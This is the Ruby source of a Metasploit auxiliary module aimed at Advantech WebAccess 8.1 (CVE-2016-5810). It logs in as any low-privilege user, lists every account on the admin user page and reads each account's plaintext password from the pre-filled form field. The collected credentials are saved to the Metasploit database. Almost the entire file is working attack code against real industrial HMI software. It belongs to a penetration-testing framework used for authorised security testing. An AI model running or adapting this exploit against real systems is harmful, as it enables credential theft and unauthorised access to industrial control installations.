Path: blob/master/modules/auxiliary/gather/advantech_webaccess_creds.rb
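##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Redirect target the application uses after a successful sign-in.
  LOGIN_SUCCESS_LOCATION = '/broadweb/bwproj.asp'.freeze

  # Extracts the session cookie handed out by the application on sign-in.
  SESSION_COOKIE_RE = /(ASPSESSIONID\w+=\w+);/.freeze

  # Extracts the user name from a link to the per-user admin page.
  USER_LINK_RE = %r{broadWeb/user/upAdminPg\.asp\?uname=(.+)}.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Advantech WebAccess 8.1 Post Authentication Credential Collector",
        'Description' => %q{
          This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.
          Although authentication is required, any level of user permission can exploit this vulnerability.

          Note that 8.2 is not suitable for this.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # Pointed out the obvious during a PR review for CVE-2017-5154
          'sinn3r', # Metasploit module
        ],
        'References' => [
          ['CVE', '2016-5810'],
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229']
        ],
        'DisclosureDate' => '2017-01-21',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('WEBACCESSUSER', [true, 'Username for Advantech WebAccess', 'admin']),
        OptString.new('WEBACCESSPASS', [false, 'Password for Advantech WebAccess', '']),
        OptString.new('TARGETURI', [true, 'The base path to Advantech WebAccess', '/']),
      ]
    )
  end

  # Signs in with WEBACCESSUSER/WEBACCESSPASS and reports the credential.
  #
  # @return [String, nil] the ASPSESSIONID cookie pair on success ('' when
  #   the server set no recognisable session cookie), nil when the sign-in
  #   was rejected.
  # @raise [Msf::Exploit::Failed] via fail_with when no response arrives.
  def do_login
    vprint_status("Attempting to login as '#{datastore['WEBACCESSUSER']}:#{datastore['WEBACCESSPASS']}'")

    uri = normalize_uri(target_uri.path, 'broadweb', 'user', 'signin.asp')

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => uri,
      'vars_post' => {
        'page' => '/',
        'pos' => '',
        'username' => datastore['WEBACCESSUSER'],
        'password' => datastore['WEBACCESSPASS'],
        'remMe' => '',
        'submit1' => 'Login'
      }
    )

    fail_with(Failure::Unknown, 'Connection timed out while trying to login') unless res

    # Success is signalled only by the redirect target, not by the status code.
    if res.headers['Location'] == LOGIN_SUCCESS_LOCATION
      print_good("Logged in as #{datastore['WEBACCESSUSER']}")
      report_cred(
        user: datastore['WEBACCESSUSER'],
        password: datastore['WEBACCESSPASS'],
        status: Metasploit::Model::Login::Status::SUCCESSFUL
      )
      return res.get_cookies.scan(SESSION_COOKIE_RE).flatten.first || ''
    end

    print_error("Unable to login as '#{datastore['WEBACCESSUSER']}:#{datastore['WEBACCESSPASS']}'")

    nil
  end

  # Reads the password pre-filled in the admin page for one user.
  #
  # @param sid [String] session cookie returned by #do_login
  # @param user [String] user name as listed on AdminPg.asp
  # @return [String, nil] the password, or nil when the request timed out or
  #   the page has no Password field / value attribute.
  def get_user_cred_detail(sid, user)
    vprint_status("Gathering password for user: #{user}")

    uri = normalize_uri(target_uri.path, 'broadWeb', 'user', 'upAdminPg.asp')

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => uri,
      'cookie' => sid,
      'vars_get' => {
        'uname' => user
      }
    )

    unless res
      print_error("Unable to gather password for user #{user} due to a connection timeout")
      return nil
    end

    pass_field = res.get_html_document.at('input[@name="Password"]')
    return nil unless pass_field

    # A Password input without a value attribute yields nil instead of raising.
    pass_field.attributes['value']&.text
  end

  # Lists the user names linked from the admin user page.
  #
  # @param sid [String] session cookie returned by #do_login
  # @return [Array<String>] URI-decoded user names; empty when none are linked
  # @raise [Msf::Exploit::Failed] via fail_with when no response arrives.
  def get_users_page(sid)
    vprint_status('Checking user page...')

    uri = normalize_uri(target_uri.path, 'broadWeb', 'user', 'AdminPg.asp')

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => uri,
      'cookie' => sid
    )

    fail_with(Failure::Unknown, 'Connection timed out while checking AdminPg.asp') unless res

    html = res.get_html_document

    users = html.search('a').map do |anchor|
      # Anchors without an href (e.g. named anchors) must not raise.
      href = anchor.attributes['href']
      next '' unless href

      Rex::Text.uri_decode(href.text.scan(USER_LINK_RE).flatten.first || '')
    end

    users.reject(&:blank?)
  end

  # Stores a credential and its login attempt in the database.
  #
  # @param opts [Hash] :user, :password, :status and optional :proof
  # @return [Metasploit::Credential::Login] the created login record
  def report_cred(opts)
    service_data = {
      address: rhost,
      port: rport,
      service_name: 'webaccess',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: DateTime.now,
      core: create_credential(credential_data),
      status: opts[:status],
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Logs in, enumerates users and reports every recovered password.
  def run
    cookie = do_login
    # do_login returns nil when the sign-in is rejected; without a session
    # the user enumeration below would run unauthenticated and find nothing.
    fail_with(Failure::NoAccess, 'Login failed, check WEBACCESSUSER and WEBACCESSPASS') if cookie.nil?

    users = get_users_page(cookie)
    print_status('No users linked from AdminPg.asp') if users.empty?

    users.each do |user|
      pass = get_user_cred_detail(cookie, user)
      next unless pass

      report_cred(
        user: user,
        password: pass,
        status: Metasploit::Model::Login::Status::SUCCESSFUL,
        proof: 'AdminPg.asp'
      )

      print_good("Found password: #{user}:#{pass}")
    end
  end
end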